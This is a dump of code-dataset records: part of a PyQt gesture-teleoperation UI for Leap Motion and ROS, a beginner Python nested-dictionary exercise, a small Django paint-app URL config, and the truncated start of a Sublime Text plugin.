2:\n self.movePage(e)\n\n\n QMainWindow.paintEvent(self, e)\n painter = QPainter(self)\n painter.setPen(QPen(Qt.red, 3))\n\n for h in ['l', 'r']:\n if getattr(ml.md, h+'_present')():\n pts = len(ml.md.frames)\n if pts > 10: pts = 10\n for n in range(1,pts):\n #if ml.md.frames[-n-1].l.visible and ml.md.frames[-n].l.visible:\n if getattr(ml.md.frames[-n-1], h).visible and getattr(ml.md.frames[-n], h).visible:\n #p1 = tfm.transformLeapToUIsimple(ml.md.frames[-n].l.palm_pose())\n p1 = tfm.transformLeapToUIsimple(getattr(ml.md.frames[-n], h).palm_pose())\n #p2 = tfm.transformLeapToUIsimple(ml.md.frames[-n-1].l.palm_pose())\n p2 = tfm.transformLeapToUIsimple(getattr(ml.md.frames[-n-1], h).palm_pose())\n if is_hand_inside_ball(getattr(ml.md.frames[-n], h)):\n painter.setPen(QPen(Qt.green, p1.position.z))\n painter.drawLine(p1.position.x, p1.position.y, p2.position.x, p2.position.y)\n else:\n 
painter.setPen(QPen(Qt.red, 1))\n painter.drawLine(p1.position.x-10, p1.position.y-10, p2.position.x+10, p2.position.y+10)\n painter.drawLine(p1.position.x-10, p1.position.y+10, p2.position.x+10, p2.position.y-10)\n\n if gl.gd.r.static[-1] and self.cursor_enabled() and 'point' in gl.gd.r.static.info.names:\n pose_c = tfm.transformLeapToUIsimple(ml.md.frames[-1].r.palm_pose())\n x_c,y_c = pose_c.position.x, pose_c.position.y\n\n rad = gl.gd.r.static[-1].point.time_visible*80\n if rad > 100:\n rad = 100\n\n painter.setPen(QPen(Qt.yellow, 4))\n painter.drawEllipse(x_c-rad/2,y_c-rad/2, rad, rad)\n\n #painter.setPen(QPen(Qt.black, 1))\n #painter.drawLine(self.w/2,self.h-20, self.w-RIGHT_MARGIN-ICON_SIZE, self.h-20)\n #painter.drawLine(self.w/2,self.h-20, self.w/2, TOP_MARGIN+ICON_SIZE)\n #self.lblStartAxis.setGeometry(self.w/2+5, self.h-70, 100, 50)\n #self.lblStartAxis.setText(str(ml.md.ENV['start']))\n\n\n\n ''' Draw the bone structure '''\n for h in ['l', 'r']:\n painter.setPen(QPen(Qt.black, 2))\n #if ml.md.r_present():\n if getattr(ml.md, h+'_present')():\n hand = getattr(ml.md.frames[-1], h)\n palm = hand.palm_position()\n wrist = hand.wrist_position()\n\n elbow = hand.elbow_position()\n pose_palm = Pose()\n pose_palm.position = Point(palm[0], palm[1], palm[2])\n pose_wrist = Pose()\n pose_wrist.position = Point(wrist[0], wrist[1], wrist[2])\n pose_elbow = Pose()\n pose_elbow.position = Point(elbow[0], elbow[1], elbow[2])\n pose_palm_ = tfm.transformLeapToUIsimple(pose_palm)\n pose_wrist_ = tfm.transformLeapToUIsimple(pose_wrist)\n x, y = pose_palm_.position.x, pose_palm_.position.y\n x_, y_ = pose_wrist_.position.x, pose_wrist_.position.y\n painter.drawLine(x, y, x_, y_)\n pose_elbow_ = tfm.transformLeapToUIsimple(pose_elbow)\n x, y = pose_elbow_.position.x, pose_elbow_.position.y\n painter.drawLine(x, y, x_, y_)\n\n if h == 'l':\n ''' Set builder mode '''\n nBuild_modes = len(ml.md.build_modes)\n id_build_mode = ml.md.build_modes.index(ml.md.build_mode)\n painter.setPen(QPen(Qt.blue, 4))\n for n, i in enumerate(ml.md.build_modes):\n x_bm, y_bm = point_by_ratio((x, y),(x_, y_), 0.5+0.5*(n/nBuild_modes))\n\n if n == id_build_mode:\n painter.setBrush(QBrush(Qt.blue, Qt.SolidPattern))\n else:\n painter.setBrush(QBrush(Qt.blue, Qt.NoBrush))\n painter.drawEllipse(x+x_bm-5, y+y_bm-5, 10, 10)\n\n painter.setPen(QPen(Qt.black, 2))\n\n for finger in hand.fingers:\n for b in range(0, 4):\n bone = finger.bones[b]\n pose_bone_prev = Pose()\n pose_bone_prev.position = Point(bone.prev_joint[0], bone.prev_joint[1], bone.prev_joint[2])\n pose_bone_next = Pose()\n pose_bone_next.position = Point(bone.next_joint[0], bone.next_joint[1], bone.next_joint[2])\n pose_bone_prev_ = tfm.transformLeapToUIsimple(pose_bone_prev)\n pose_bone_next_ = tfm.transformLeapToUIsimple(pose_bone_next)\n x, y = pose_bone_prev_.position.x, pose_bone_prev_.position.y\n x_, y_ = pose_bone_next_.position.x, pose_bone_next_.position.y\n painter.drawLine(x, y, x_, y_)\n\n\n def movePage(self, e):\n pass\n\n def mainPage(self, e):\n w = self.w\n h = self.h\n qp = QPainter()\n qp.begin(self)\n textStatus = \"\"\n if ml.md.goal_pose and ml.md.goal_joints:\n structures_str = [structure.object_stack for structure in ml.md.structures]\n textStatus += f\"eef: {str(round(ml.md.eef_pose.position.x,2))} {str(round(ml.md.eef_pose.position.y,2))} {str(round(ml.md.eef_pose.position.z,2))}\\ng p: {str(round(ml.md.goal_pose.position.x,2))} {str(round(ml.md.goal_pose.position.y,2))} {str(round(ml.md.goal_pose.position.z,2))}\\ng 
q:{str(round(ml.md.goal_pose.orientation.x,2))} {str(round(ml.md.goal_pose.orientation.y,2))} {str(round(ml.md.goal_pose.orientation.z,2))} {str(round(ml.md.goal_pose.orientation.w,2))}\\nAttached: {ml.md.attached}\\nbuild_mode {ml.md.build_mode}\\nobject_touch and focus_id {ml.md.object_focus_id} {ml.md.object_focus_id}\\nStructures: {str(structures_str)}\"\n\n if self.recording:\n qp.setBrush(QBrush(Qt.red, Qt.SolidPattern))\n qp.drawEllipse(LEFT_MARGIN+130+ICON_SIZE*2, h-10-ICON_SIZE, ICON_SIZE/2,ICON_SIZE/2)\n qp.setBrush(QBrush(Qt.black, Qt.NoBrush))\n self.lblInfo.setGeometry(LEFT_MARGIN+130, h-ICON_SIZE,ICON_SIZE*5,ICON_SIZE)\n self.lblStatus.setText(textStatus)\n\n self.lbl3.setText(\"Det.: \"+settings.get_hand_mode()['l'])\n self.lbl4.setText(\"Det.: \"+settings.get_hand_mode()['r'])\n\n self.lbl2.move(self.size().width()-RIGHT_MARGIN-40, 36)\n self.lbl4.move(self.size().width()-RIGHT_MARGIN-40, TOP_MARGIN_GESTURES-30)\n\n if self.GesturesViewState:\n # up late\n if ml.md.frames:\n qp.drawLine(LEFT_MARGIN, TOP_MARGIN+(1)*ICON_SIZE+5,\n LEFT_MARGIN+2*ICON_SIZE+2, TOP_MARGIN+(1)*ICON_SIZE+5)\n # hand fingers\n n = 0\n if ml.md.frames[-1].l.confidence > settings.yaml_config_gestures['min_confidence']:\n qp.drawRect(LEFT_MARGIN,TOP_MARGIN+(n)*ICON_SIZE, ICON_SIZE, ICON_SIZE)\n qp.drawLine(LEFT_MARGIN+ICON_SIZE+2, TOP_MARGIN+(n+1)*ICON_SIZE, LEFT_MARGIN+ICON_SIZE+2, int(TOP_MARGIN+(n+1)*ICON_SIZE-round(ml.md.frames[-1].l.confidence,2)*ICON_SIZE))\n for i in range(0,5):\n if ml.md.frames[-1].l.oc_activates[i]:\n qp.drawPixmap(LEFT_MARGIN, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"hand\"+str(i+1)+\"open_left.png\"))\n else:\n qp.drawPixmap(LEFT_MARGIN, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"hand\"+str(i+1)+\"closed_left.png\"))\n\n qp.drawLine(w-RIGHT_MARGIN-ICON_SIZE, TOP_MARGIN+(1)*ICON_SIZE+5, w-RIGHT_MARGIN+ICON_SIZE+2, TOP_MARGIN+(1)*ICON_SIZE+5)\n if ml.md.frames[-1].r.confidence > settings.yaml_config_gestures['min_confidence']:\n qp.drawRect(w-RIGHT_MARGIN,TOP_MARGIN+(n)*ICON_SIZE, ICON_SIZE, ICON_SIZE)\n qp.drawLine(w-RIGHT_MARGIN+ICON_SIZE+2, TOP_MARGIN+(n+1)*ICON_SIZE, w-RIGHT_MARGIN+ICON_SIZE+2, int(TOP_MARGIN+(n+1)*ICON_SIZE-round(ml.md.frames[-1].r.confidence,2)*ICON_SIZE))\n for i in range(0,5):\n if ml.md.frames[-1].r.oc_activates[i]:\n qp.drawPixmap(w-RIGHT_MARGIN, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"hand\"+str(i+1)+\"open.png\"))\n else:\n qp.drawPixmap(w-RIGHT_MARGIN, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"hand\"+str(i+1)+\"closed.png\"))\n\n ''' Direction of hand '''\n for h, X in [('l', LEFT_MARGIN+ICON_SIZE), ('r', w-RIGHT_MARGIN-ICON_SIZE)]:\n point_direction = getattr(ml.md.frames[-1], h).point_direction()\n if point_direction[0] < 0.0:\n qp.drawPixmap(X, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"arrow_right.png\"))\n if point_direction[0] > 0.0:\n qp.drawPixmap(X, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"arrow_left.png\"))\n if point_direction[1] < 0.0:\n qp.drawPixmap(X, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"arrow_up.png\"))\n if point_direction[1] > 0.0:\n qp.drawPixmap(X, TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"arrow_down.png\"))\n\n ''' Left side lane - Gestures '''\n static_gs_file_images = gl.gd.static_info().filenames\n static_gs_names = gl.gd.static_info().names\n dynamic_gs_file_images = 
gl.gd.dynamic_info().filenames\n dynamic_gs_names = gl.gd.dynamic_info().names\n for n, i in enumerate(static_gs_file_images):\n image_filename = settings.paths.graphics_path+i\n image_filename = f\"{image_filename[:-4]}_left{image_filename[-4:]}\"\n qp.drawPixmap(LEFT_MARGIN, TOP_MARGIN_GESTURES+n*ICON_SIZE, ICON_SIZE, ICON_SIZE, QPixmap(image_filename))\n\n if gl.gd.l.static.relevant():\n for n, i in enumerate(static_gs_file_images):\n\n if gl.gd.l.static[-1][n].activated:\n qp.drawRect(LEFT_MARGIN,TOP_MARGIN_GESTURES+(n)*ICON_SIZE, ICON_SIZE, ICON_SIZE)\n qp.drawLine(LEFT_MARGIN+ICON_SIZE+2, TOP_MARGIN_GESTURES+(n+1)*ICON_SIZE, LEFT_MARGIN+ICON_SIZE+2, int(TOP_MARGIN_GESTURES+(n+1)*ICON_SIZE-gl.gd.l.static[-1][n].probability*ICON_SIZE))\n qp.drawText(LEFT_MARGIN+ICON_SIZE+5, TOP_MARGIN_GESTURES+n*ICON_SIZE+10, static_gs_names[n])\n '''\n if gl.gd.r.static.relevant():\n for n, i in enumerate(static_gs_file_images):\n image_filename = settings.paths.graphics_path+i\n qp.drawPixmap(w-RIGHT_MARGIN, TOP_MARGIN_GESTURES+n*ICON_SIZE, ICON_SIZE, ICON_SIZE, QPixmap(image_filename))\n\n if gl.gd.r.static[-1][n].activated:\n qp.drawRect(w-RIGHT_MARGIN,TOP_MARGIN_GESTURES+(n)*ICON_SIZE, ICON_SIZE, ICON_SIZE)\n qp.drawLine(w-RIGHT_MARGIN+ICON_SIZE+2, TOP_MARGIN_GESTURES+(n+1)*ICON_SIZE, w-RIGHT_MARGIN+ICON_SIZE+2, int(TOP_MARGIN_GESTURES+(n+1)*ICON_SIZE-gl.gd.r.static[-1][n].probability*ICON_SIZE))\n qp.drawText(w-RIGHT_MARGIN+ICON_SIZE+5, TOP_MARGIN_GESTURES+n*ICON_SIZE+10, static_gs_names[n])\n '''\n '''\n for n, i in enumerate(dynamic_gs_file_images):\n qp.drawPixmap(LEFT_MARGIN, TOP_MARGIN_GESTURES+(n+len(static_gs_file_images))*ICON_SIZE, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+i))\n\n if gl.gd.r.dynamic and gl.gd.r.dynamic.relevant():\n probabilities = gl.gd.r.dynamic[-1].probabilities_norm\n for n, i in enumerate(dynamic_gs_file_images):\n\n\n if gl.gd.r.dynamic[-1][n].activated:\n qp.drawRect(LEFT_MARGIN,TOP_MARGIN_GESTURES+(n+len(static_gs_file_images))*ICON_SIZE, ICON_SIZE, ICON_SIZE)\n qp.drawLine(LEFT_MARGIN+ICON_SIZE+2, TOP_MARGIN_GESTURES+(n+1+len(static_gs_file_images))*ICON_SIZE, LEFT_MARGIN+ICON_SIZE+2, TOP_MARGIN_GESTURES+(n+1+len(static_gs_file_images))*ICON_SIZE-probabilities[n]*ICON_SIZE)\n qp.drawText(LEFT_MARGIN+ICON_SIZE+5, TOP_MARGIN_GESTURES+(n+len(static_gs_file_images))*ICON_SIZE+10, dynamic_gs_names[n])\n '''\n for n, i in enumerate(dynamic_gs_file_images):\n qp.drawPixmap(w-RIGHT_MARGIN, TOP_MARGIN_GESTURES+n*ICON_SIZE, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+i))\n if gl.gd.r.dynamic and gl.gd.r.dynamic.relevant():\n probabilities = gl.gd.r.dynamic[-1].probabilities_norm\n for n, i in enumerate(dynamic_gs_file_images):\n\n if gl.gd.r.dynamic[-1][n].activated:\n qp.drawRect(w-RIGHT_MARGIN,TOP_MARGIN_GESTURES+(n)*ICON_SIZE, ICON_SIZE, ICON_SIZE)\n qp.drawLine(w-RIGHT_MARGIN-2, TOP_MARGIN_GESTURES+(n+1)*ICON_SIZE, w-RIGHT_MARGIN-2, int(TOP_MARGIN_GESTURES+(n+1)*ICON_SIZE-probabilities[n]*ICON_SIZE))\n qp.drawText(w-RIGHT_MARGIN-90, TOP_MARGIN_GESTURES+n*ICON_SIZE+10, dynamic_gs_names[n])\n\n if gl.gd.l.static and gl.gd.l.static.relevant():\n n_ = gl.gd.l.static.relevant().biggest_probability_id\n qp.drawPixmap(LEFT_MARGIN+ICON_SIZE+10,TOP_MARGIN_GESTURES+n_*ICON_SIZE, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"arrow_left.png\"))\n if gl.gd.r.dynamic and gl.gd.r.dynamic.relevant():\n n_ = gl.gd.r.dynamic.relevant().biggest_probability_id\n qp.drawPixmap(w-RIGHT_MARGIN-90,TOP_MARGIN_GESTURES+n_*ICON_SIZE, ICON_SIZE, 
ICON_SIZE, QPixmap(settings.paths.graphics_path+\"arrow_right.png\"))\n\n\n # circ options\n ### DEPRECATED\n if 'circ' in gl.gd.r.dynamic.info.names:\n g = gl.gd.r.dynamic.circ\n if g.activate:\n X = LEFT_MARGIN+130\n Y = TOP_MARGIN+len(static_gs_file_images)*ICON_SIZE\n ARRL = 10 # Arrow length\n radius_2mm = g.radius/2\n qp.drawEllipse(X,Y, radius_2mm, radius_2mm)\n rh = radius_2mm/2\n if g.clockwise == True:\n qp.drawLine(X, Y+rh, X-ARRL, Y+ARRL+rh)\n qp.drawLine(X, Y+rh, X+ARRL, Y+ARRL+rh)\n else:\n qp.drawLine(X, Y+rh, X-ARRL, Y-ARRL+rh)\n qp.drawLine(X, Y+rh, X+ARRL, Y-ARRL+rh)\n if ml.md.live_mode_drawing:\n qp.drawPixmap(w/2, ICON_SIZE/2+TOP_MARGIN, ICON_SIZE/2, ICON_SIZE/2, QPixmap(settings.paths.graphics_path+\"directional.png\"))\n if ml.md.live_mode_drawing_rot:\n qp.drawPixmap(w/2+ICON_SIZE/2, ICON_SIZE/2+TOP_MARGIN, ICON_SIZE/2, ICON_SIZE/2, QPixmap(settings.paths.graphics_path+\"round.png\"))\n\n if self.MoveViewState:\n if ml.md.mode == 'play':\n if ml.md.frames and ml.md.frames[-1].l.visible:\n if ml.md.frames[-1].l.grab_strength:\n qp.drawPixmap(w/2, ICON_SIZE+TOP_MARGIN, ICON_SIZE, ICON_SIZE, QPixmap(settings.paths.graphics_path+\"hold.png\"))\n if ml.md.HoldPrevState == False:\n ml.md.HoldAnchor = ml.md.HoldValue - ml.md.frames[-1].l.palm_pose().position.x/len(sl.paths[ml.md.picked_path].poses)\n ml.md.HoldValue = ml.md.HoldAnchor + ml.md.frames[-1].l.palm_pose().position.x/len(sl.paths[ml.md.picked_path].poses)\n ml.md.HoldValue = ml.md.HoldAnchor + ml.md.frames[-1].l.palm_pose().position.x/2\n if ml.md.HoldValue > 100: ml.md.HoldValue = 100\n if ml.md.HoldValue < 0: ml.md.HoldValue = 0\n\n # # TODO: Hard value\n ml.md.HoldPrevState = ml.md.frames[-1].l.grab_strength > 0.8\n diff_pose_progress = 100/len(sl.paths[ml.md.picked_path].poses)\n for i in range(0, len(sl.paths[ml.md.picked_path].poses)):\n qp.fillRect(LEFT_MARGIN+diff_pose_progress*i*((w-40.0)/100.0), 30, 2, 20, Qt.black)\n qp.fillRect(LEFT_MARGIN+diff_pose_progress*ml.md.currentPose*((w-40.0)/100.0)+2, 35, diff_pose_progress*((w-40.0)/100.0), 10, Qt.red)\n qp.drawRect(LEFT_MARGIN, 30, w-40, 20)\n qp.fillRect(LEFT_MARGIN+ml.md.HoldValue*((w-40.0)/100.0), 30, 10, 20, Qt.black)\n\n if self.GesturesViewState:\n '''\n # right lane\n for n, i in enumerate(self.lblRightPanelNamesObj):\n i.setVisible(True)\n i.move(w-RIGHT_MARGIN, int(TOP_MARGIN+n*ICON_SIZE/2))\n if ml.md.present():\n values, activates = self.getRightPanelValues(), self.getRightPanelActivates()\n for n in range(len(values)):\n obj = self.lblRightPanelValuesObj[n]\n obj.move(w-RIGHT_MARGIN, TOP_MARGIN+(n+0.5)*ICON_SIZE/2)\n obj.setText(str(values[n]))\n qp.drawLine(w-RIGHT_MARGIN-5+values[n]*ICON_SIZE, TOP_MARGIN+(n+1)*ICON_SIZE/2, w-RIGHT_MARGIN-5, TOP_MARGIN+(n+1)*ICON_SIZE/2)\n if activates[n]:\n qp.drawRect(w-RIGHT_MARGIN-5, TOP_MARGIN+(n)*ICON_SIZE/2+5, ICON_SIZE, ICON_SIZE/2-10)\n '''\n # orientation\n '''\n if self.cursor_enabled():\n roll, pitch, yaw = ml.md.frames[-1].r.palm_euler()\n x = np.cos(yaw)*np.cos(pitch)\n y = np.sin(yaw)*np.cos(pitch)\n z = np.sin(pitch)\n\n last_pose_ = tfm.transformLeapToUIsimple(ml.md.frames[-1].r.palm_pose())\n x_c,y_c = last_pose_.position.x, last_pose_.position.y\n qp.setPen(QPen(Qt.blue, 4))\n qp.drawLine(x_c, y_c, x_c+y*2*ICON_SIZE, y_c-z*2*ICON_SIZE)\n '''\n\n qp.end()\n\n def configPage(self, e):\n w = self.size().width()\n h = self.size().height()\n # computation part\n qp = QPainter()\n qp.begin(self)\n BarW = (w-LEFT_MARGIN-RIGHT_MARGIN)/settings.NumConfigBars[1]\n BarH = 
(h-TOP_MARGIN-BOTTOM_MARGIN)/settings.NumConfigBars[0]\n X_START = [int(LEFT_MARGIN+i*BarW+BAR_MARGIN) for i in range(0,settings.NumConfigBars[1])]\n Y_START = [int(TOP_MARGIN+BAR_MARGIN+i*BarH) for i in range(0, settings.NumConfigBars[0])]\n X_LEN = int(BarW-BAR_MARGIN)\n Y_LEN = int(BarH-BAR_MARGIN)\n X_END = np.add(X_START,int(BarW-BAR_MARGIN))\n Y_END = np.add(Y_START,int(BarH-BAR_MARGIN))\n X_BOUND = tuple(zip(X_START, X_END))\n Y_BOUND = tuple(zip(Y_START, Y_END))\n # picking part\n if self.cursor_enabled():\n last_pose_ = tfm.transformLeapToUIsimple(ml.md.frames[-1].r.palm_pose())\n x,y = last_pose_.position.x, last_pose_.position.y\n else:\n x,y = self.mousex, self.mousey\n x_ = (np.min(X_BOUND, 1) < x) & (x < np.max(X_BOUND, 1))\n y_ = (np.min(Y_BOUND, 1) < y) & (y < np.max(Y_BOUND, 1))\n prevPicked = deepcopy(self.pickedSolution)\n for n, i in enumerate(x_):\n for m, j in enumerate(y_):\n valueInt, valueStr = self.readConfigPageValues(m, n)\n self.lblConfNamesObj[n+m*settings.NumConfigBars[1]].move(X_START[n], Y_START[m]-25)\n self.lblConfNamesObj[n+m*settings.NumConfigBars[1]].setVisible(True)\n self.lblConfValuesObj[n+m*settings.NumConfigBars[1]].move(X_START[n]+BarW-40-BAR_MARGIN, Y_START[m]-25)\n self.lblConfValuesObj[n+m*settings.NumConfigBars[1]].setVisible(True)\n self.lblConfValuesObj[n+m*settings.NumConfigBars[1]].setText(valueStr)\n qp.drawRect(X_START[n], Y_START[m], X_LEN, Y_LEN)\n picked = (i and j)\n if (picked == True) and (picked == self.pickedSolution[m, n]):\n self.pickedTime[m, n] += 0.1\n if self.pickedTime[m, n] > 2.0:\n self.saveConfigPageValues(m,n,abs(Y_START[m] - y))\n self.pickedTime[m, n] = 0\n else:\n self.pickedTime[m, n] = 0\n self.pickedSolution[m, n] = picked\n qp.fillRect(X_START[n], Y_START[m], X_LEN, valueInt, QColor('black'))\n\n\n qp.end()\n\n def saveConfigPageValues(self, m, n, value):\n # Items on the list\n # ['Gripper open', 'Applied force', 'Work reach', 'Shift start x', 'Speed', 'Scene change', 'mode', 'Path']\n settings.VariableValues[m, n] = value\n if m == 0:\n if n == 0:\n ml.md.gripper = value\n elif n == 1:\n ml.md.applied_force = value\n elif n == 2:\n ml.md.SCALE = value/50\n elif n == 3:\n ml.md.ENV['start'].x = value/100\n elif m == 1:\n if n == 0:\n ml.md.speed = value\n elif n == 1:\n scenes = settings.getSceneNames()\n v = int(len(scenes)/125. * value)\n if v >= len(scenes):\n v = len(scenes)-1\n sl.scene.make_scene(scene=scenes[v])\n elif n == 2:\n modes = ml.md.modes()\n v = int(len(modes)/125. * value)\n if v >= len(modes):\n v = len(modes)-1\n ml.md.mode = modes[v]\n elif n == 3:\n paths = settings.getPathNames()\n v = int(len(paths)/125. 
* value)\n if v >= len(paths):\n v = len(paths)-1\n settings.mo.changePlayPath(path_=paths[v])\n\n def readConfigPageValues(self, m, n):\n string = None\n if m == 0:\n if n == 0:\n value = ml.md.gripper\n elif n == 1:\n value = ml.md.applied_force\n elif n == 2:\n value = ml.md.scale*50\n elif n == 3:\n value = ml.md.ENV['start'].x*100\n elif m == 1:\n if n == 0:\n value = ml.md.speed\n elif n == 1:\n if sl.scene:\n scenes = sl.scenes.names()\n value = scenes.index(sl.scene.name)\n string = sl.scene.name\n else: value = 0\n elif n == 2:\n modes = ml.md.modes()\n value = modes.index(ml.md.mode)\n string = ml.md.mode\n elif n == 3:\n value = ml.md.picked_path\n paths = sl.paths.names()\n string = paths[value]\n\n settings.VariableValues[m, n] = float(value)\n if not string:\n string = str(value)\n return value, string\n\n\n def cursor_enabled(self):\n ''' Checks whether enough hand samples have been collected\n '''\n if ml.md.r_present() and len(ml.md.frames) >= 10:\n return True\n return False\n\n def timerEvent(self, event):\n if ml.md.frames and self.OneTimeTurnOnGesturesViewStateOnLeapMotionSignIn:\n self.OneTimeTurnOnGesturesViewStateOnLeapMotionSignIn = False\n self.GesturesViewState = True\n self.comboPlayNLive.addItem(\"Live hand\")\n\n ''' DEPRECATED\n if ml.md.frames and gl.gd.r.dynamic.info.names:\n fa = ml.md.frames[-1]\n for i in gl.gd.r.dynamic[-1][0:4]: # circ, swipe, pin, touch\n if i.time_visible > 0:\n i.time_visible -= 0.1\n else:\n i.toggle = False\n if fa.r.visible == False:\n for i in gl.gd.r.dynamic[-1]:\n i.toggle = False if isinstance(i.toggle, bool) else [False] * len(i.toggle)\n for i in gl.gd.r.static[-1]:\n i.toggle = False\n if fa.l.visible == False:\n for i in gl.gd.l.dynamic[-1]:\n i.toggle = False if isinstance(i.toggle, bool) else [False] * len(i.toggle)\n for i in gl.gd.l.static[-1]:\n i.toggle = False\n\n self.step = self.step + 1\n '''\n self.update()\n\n\n def mapQtKey(self, key):\n key = str(key)\n mapDict = {\n '0': Qt.Key_0 ,\n '1': Qt.Key_1 ,\n '2': Qt.Key_2 ,\n '3': Qt.Key_3 ,\n '4': Qt.Key_4 ,\n '5': Qt.Key_5 ,\n '6': Qt.Key_6 ,\n '7': Qt.Key_7 ,\n '8': Qt.Key_8 ,\n '9': Qt.Key_9 ,\n 'a': Qt.Key_A ,\n 'b': Qt.Key_B ,\n 'c': Qt.Key_C ,\n 'd': Qt.Key_D ,\n 'e': Qt.Key_E ,\n 'f': Qt.Key_F ,\n 'g': Qt.Key_G ,\n 'h': Qt.Key_H ,\n 'i': Qt.Key_I ,\n 'j': Qt.Key_J ,\n 'k': Qt.Key_K ,\n 'l': Qt.Key_L ,\n 'm': Qt.Key_M ,\n 'n': Qt.Key_N ,\n 'o': Qt.Key_O ,\n 'p': Qt.Key_P ,\n 'q': Qt.Key_Q ,\n 'r': Qt.Key_R ,\n 's': Qt.Key_S ,\n 't': Qt.Key_T ,\n 'u': Qt.Key_U ,\n 'v': Qt.Key_V ,\n 'w': Qt.Key_W ,\n 'x': Qt.Key_X ,\n 'y': Qt.Key_Y ,\n 'z': Qt.Key_Z,\n '': Qt.Key_0\n }\n return mapDict[key]\n\n def thread_testInit(self):\n thread = Thread(target = ml.md.testInit)\n thread.start()\n def thread_testMovements(self):\n thread = Thread(target = ml.md.testMovements)\n thread.start()\n def thread_testMovementsInput(self):\n thread = Thread(target = ml.md.testMovementsInput)\n thread.start()\n def thread_inputPlotJointsAction(self):\n thread = Thread(target = ml.md.inputPlotJointsAction)\n thread.start()\n def thread_inputPlotPosesAction(self):\n thread = Thread(target = ml.md.inputPlotPosesAction)\n thread.start()\n\n\nclass ObjectQt():\n def __init__(self, NAME=None, qt=None, page=None, view_group=['GesturesViewState']):\n ''' Information about app objects\n Parameters:\n NAME (Str): Name of object\n qt (Qt Object): Interaction variable\n page (Int): On what page this object is\n view_group (Str[]): In which groups this object belongs\n '''\n self.NAME = NAME\n self.qt = qt\n 
self.page = page\n self.view_group = view_group\n\nclass RepeatableTimer(object):\n def __init__(self, interval, function, args=[], kwargs={}):\n self._interval = interval\n self._function = function\n self._args = args\n self._kwargs = kwargs\n def start(self):\n t = Timer(self._interval, self._function, *self._args, **self._kwargs)\n t.start()\n\n\ndef main():\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())\n\ndef ui_thread_launch():\n\n if rospy.get_param(\"/mirracle_config/launch_ui\", 'false') == \"true\":\n thread_ui = Thread(target = main)\n thread_ui.daemon=True\n thread_ui.start()\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n","repo_name":"imitrob/teleop_gesture_toolbox","sub_path":"src/ui_lib.py","file_name":"ui_lib.py","file_ext":"py","file_size_in_byte":78396,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"18899226330","text":"x = [ [5,2,3], [10,8,9] ] \nstudents = [\n {'first_name': 'Michael', 'last_name' : 'Jordan'},\n {'first_name' : 'John', 'last_name' : 'Rosales'}\n]\nsports_directory = {\n 'basketball' : ['Kobe', 'Jordan', 'James', 'Curry'],\n 'soccer' : ['Messi', 'Ronaldo', 'Rooney']\n}\nz = [ {'x': 10, 'y': 20} ]\n\nx[1][0] = 15\nstudents[0][\"last_name\"] = \"Bryant\"\nsports_directory[\"soccer\"][0] = \"Andres\"\nz[0][\"y\"] = 30\n\nstudents = [\n {'first_name': 'Michael', 'last_name' : 'Jordan'},\n {'first_name' : 'John', 'last_name' : 'Rosales'},\n {'first_name' : 'Mark', 'last_name' : 'Guillen'},\n {'first_name' : 'KB', 'last_name' : 'Tonel'}\n ]\n\ndef iterateDictionary(some_list):\n for i in some_list:\n return f'first name --- {i[\"first_name\"]}, last name --- {i[\"last_name\"]}'\niterateDictionary(students)\n\ndef iterateDictionary2(key_name, some_list):\n keys = []\n for i in some_list:\n keys.append(i[key_name])\n return keys\nprint(iterateDictionary2(\"first_name\", students))\n\ndojo = {\n 'locations': ['San Jose', 'Seattle', 'Dallas', 'Chicago', 'Tulsa', 'DC', 'Burbank'],\n 'instructors': ['Michael', 'Amy', 'Eduardo', 'Josh', 'Graham', 'Patrick', 'Minh', 'Devon']\n}\n\ndef printInfo(some_dict):\n result = []\n for key in some_dict:\n result.append(f\"{len(some_dict[key])} {key} {some_dict[key]}\")\n return result\nprint(printInfo(dojo))\n","repo_name":"Cameronjs222/Python","sub_path":"fundamental/nested_dic.py","file_name":"nested_dic.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6937649060","text":"from django.conf.urls import patterns, include, url\nfrom mysite.views import home, current_datetime, paint, save, gallery, load, about\n\nurlpatterns = patterns('',\n url(r'^$', home),\n url(r'^about/$',about),\n url(r'^time/$',current_datetime),\n url(r'^paint/$',paint),\n url(r'^save/$', save),\n url(r'^gallery/$', gallery),\n url(r'^gallery/([^/]+)$', load),\n)\n\n\n","repo_name":"manimkv/PaintApp-using-Django-Frame-work","sub_path":"mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8720979307","text":"import json, re, os\nimport shutil, zipfile\nimport sublime, sublime_plugin\n\n# Import default package for ST3 only. 
Needed to determine its path.\nif not int(sublime.version()) < 3000:\n import Default\n\nclass QuickRefCommand(sublime_plugin.ApplicationCommand):\n def __init__(self):\n # Initialize list of commands. Needs to happen here since this value will \n # determine whether to open or close the quick panel.\n self.command_list = None\n # Running Sublime Text 2?\n self.is_st2 = int(sublime.version()) < 3000\n\n def run(self, **kwargs):\n # Get paths.\n self.paths = self.get_paths()\n\n # Get OS platform.\n self.platform = sublime.platform()\n self.platform = self.platform[0].upper() + self.platform[1:].lower()\n\n # If the command list has not been defined, run the plugin.\n if not self.command_list:\n # Set a window reference.\n self.window = sublime.active_window()\n\n # Get settings.\n self.settings = 